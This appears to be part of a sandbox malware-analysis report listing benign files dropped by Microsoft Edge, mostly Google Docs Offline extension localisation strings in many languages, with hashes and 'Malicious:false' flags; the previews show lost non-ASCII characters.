                                                                                                                                                                                                                                                                                          SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                          SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):907
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                          MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                          SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                          SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                          SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                          MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                          SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                          SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                          SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):937
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                          MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                          SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                          SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                          SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1337
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                          MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                          SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                          SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                          SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2846
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                          MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                          SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                          SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                          SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):934
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                          MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                          SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                          SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                          SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):963
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                          MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                          SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                          SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                          SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1320
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                          MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                          SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                          SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                          SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):884
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):980
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1941
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1969
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1674
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1063
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1333
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1263
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                          MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                          SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                          SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                          SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1074
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                          MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                          SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                          SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                          SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):879
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                          MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                          SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                          SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                          SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1205
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                          MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                          SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                          SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                          SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):843
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                          MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                          SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                          SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                          SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):912
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                          Encrypted:false
